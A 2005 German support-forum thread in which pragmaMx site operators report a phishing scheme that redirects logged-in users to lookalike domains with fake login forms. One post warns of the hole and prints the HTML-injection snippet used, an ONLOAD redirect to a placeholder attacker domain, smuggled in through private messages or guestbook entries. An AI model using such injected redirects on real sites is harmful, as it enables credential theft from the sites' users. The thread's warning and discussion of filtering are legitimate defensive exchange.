pragmaMx Support Forum

pragmaMx => Allgemeines => Thema gestartet von: Karaca am 29 Juni 2005, 21:03:13

Titel: Sicherheitsproblem mit Fake-Domain
Beitrag von: Karaca am 29 Juni 2005, 21:03:13
Hallo ich habe jetzt ein ganz neues anderes Problem endeckt.Ich habe mich eben auf meiner Seite als Admin angemeldet und werde eigentlich automatisch auch gleichzeitig als Benutzer angemeldet.Als ich aber einen Forumsbeitrag lesen wollte wurde ich wieder aufgefordert meinen Benutzernamen und Passwort erneut einzugeben.Mir fiel daraufhin auf das sich oben an das ".de" noch zusätzlich ein ".de.tt" angehängt hatte an der adresse.ich habe daraufhin falsche Angaben gemacht und auf Absenden geklickt.Die Daten dich ich eingegeben habe wurden dann wie man unten in der Statusleiste sehen konnte per Formailer weiterverschickt.Ich habe den Webspace besucht und noch andere Seiten gefunden auf der man meine und noch andere Vkp mx Seiten sowie Msn und Hotmail gefaked hat,Das einzige was ich jetzt nicht verstehe ist wie die Weiterleitung zustanden gekommen ist.Ich habe schon Lycos der dem Hacker den Webspace zur Verfügung stellt angeschrieben aber bisher noch keine Antwort erhalten.
Andere betroffene Seiten sind
www.palpalo.de (Vkp)
www.rebir.com (Vkp)
www.aleviler.de (Vkp)
www.flirtlife.de
www.msn.de
www.hackeriz.com (Nuke)
Titel: Re: Sicherheitsproblem im vkpMx/pragmaMx
Beitrag von: onkel am 29 Juni 2005, 21:42:20
ZitatHallo ich habe jetzt ein ganz neues anderes Problem endeckt.Ich habe mich eben auf meiner Seite als Admin angemeldet und werde eigentlich automatisch auch gleichzeitig als Benutzer angemeldet.Als ich aber einen Forumsbeitrag lesen wollte wurde ich wieder aufgefordert meinen Benutzernamen und Passwort erneut einzugeben.Mir fiel daraufhin auf das sich oben an das ".de" noch zusätzlich ein ".de.tt" angehängt hatte an der adresse.ich habe daraufhin falsche Angaben gemacht und auf Absenden geklickt.Die Daten dich ich eingegeben habe wurden dann wie man unten in der Statusleiste sehen konnte per Formailer weiterverschickt.Ich habe den Webspace besucht und noch andere Seiten gefunden auf der man meine und noch andere Vkp mx Seiten sowie Msn und Hotmail gefaked hat,Das einzige was ich jetzt nicht verstehe ist wie die Weiterleitung zustanden gekommen ist.Ich habe schon Lycos der dem Hacker den Webspace zur Verfügung stellt angeschrieben aber bisher noch keine Antwort erhalten.
Andere betroffene Seiten sind
www.palpalo.de (Vkp)
www.rebir.com (Vkp)
www.aleviler.de (Vkp)
www.flirtlife.de
www.msn.de
www.hackeriz.com (Nuke)

Du hast ein Dailer auf dein PC  ::)
Titel: Re: Sicherheitsproblem im vkpMx/pragmaMx
Beitrag von: onkel am 29 Juni 2005, 21:45:18
TOLL  ;D jetzt hast du es entfernt...
Titel: Re: Sicherheitsproblem mit Fake-Domain
Beitrag von: Andi am 29 Juni 2005, 21:46:03
Hi :)

So ganz versteh ich das nicht.
Irgendeiner hat deine Seite gefakt?

Wüsste nicht, was das mit dem pragmaMx zu tun hat, oder versteh ich das falsch? Gibt es da nen Link und ein Login zum ansehen?


Habe den Post vom anderen Thread abgetrennt.
Ist ja ein ganz anderes Thema :-\
Titel: Re: Sicherheitsproblem mit Fake-Domain
Beitrag von: NeMeSiSX2LC am 29 Juni 2005, 22:26:43
flirtlife.de?? und dailer?? Onkel erzähl mal weiter. Würde micgh freuen wen da was handfestes kommt.
Titel: Re: Sicherheitsproblem mit Fake-Domain
Beitrag von: onkel am 29 Juni 2005, 22:59:07
sowas ähnliches könnte es sein

:gucken: http://www.netzwelt.de/news/67006-internet-explorer-phishingluecke-entdeckt.html
Titel: Vorsicht-Sicherheitslücke!
Beitrag von: Firat am 30 Juni 2005, 22:36:50
Dieser Beitrag ist eigentlich eine Antwort zu diesem Topic aber so können noch mehr Leute lesen was das Problem ist.
Unzwar anscheinen haben paar Jugendliche eine Sicherhietslücke entdeckt und können durch  PMs oder Gästebucheinträge auf eigene Fake-Seiten weiterleiten und so dazu zwingen in loginformular die Passwörter zu klauen. Und hier ist die Lücke womit sie dies tun

<body id="gatewaypage" class="readstep2"  ONLOAD="location.href='http://www.deineseite.au.tt'; return false;">
    <div id="mainnavigation">


und auf der weitergeliteten Seite existiert dann eine 1 zu 1 Fake-Seite mit Loginformular!
Titel: Re: Vorsicht-Sicherheitslücke!
Beitrag von: NeMeSiSX2LC am 30 Juni 2005, 22:40:49
Haste mal ne URL zu dem der Sache glaube ich nämlich nicht wirklich was das dat steht
Titel: Re: Vorsicht-Sicherheitslücke!
Beitrag von: Firat am 30 Juni 2005, 22:59:36
dann versuch das mal selber in dem du einfach eine pm an dich selber schickst!
und hier sind die Fake seiten

http://home.arcor.de/EDITIERT/
Titel: Re: Vorsicht-Sicherheitslücke!
Beitrag von: Andi am 30 Juni 2005, 23:18:37
Es geht, wenn die übergebenen HTML-Tags nicht komplett gefiltert werden.
Kann durchaus sein, dass sowas auch in einigen Modulen möglich ist.
Sowas global auszuschliessen, bringt m.E. nicht viel, weil irgendjemand kommt dann wieder angelaufen, dass da wieder irgendwas nicht richtig geht.... Habe das vor kurzem gerade in einem anderen Forum beobachtet...

Den Link oben habe ich nicht geändert, weil da die Seiten zu sehen waren/sind, sondern weil auf der gleichen Homepage auch Links zu Scripten für "Mail-Bomben" und so Zeugs vorhanden waren.
Titel: Re: Sicherheitsproblem mit Fake-Domain
Beitrag von: selin01 am 07 August 2005, 14:39:14
Hallo Leute,

genau das ist mir auch aufgefallen. Wie oben Karaca schon geschrieben hat, hat es bei mir auch solche Fakes und Codes gegeben.

Ich habe den User solcher Beiträge ausfindig machen können und darauf hin alles gesperrt.

Dennoch wird dieser es wieder versuchen wollen.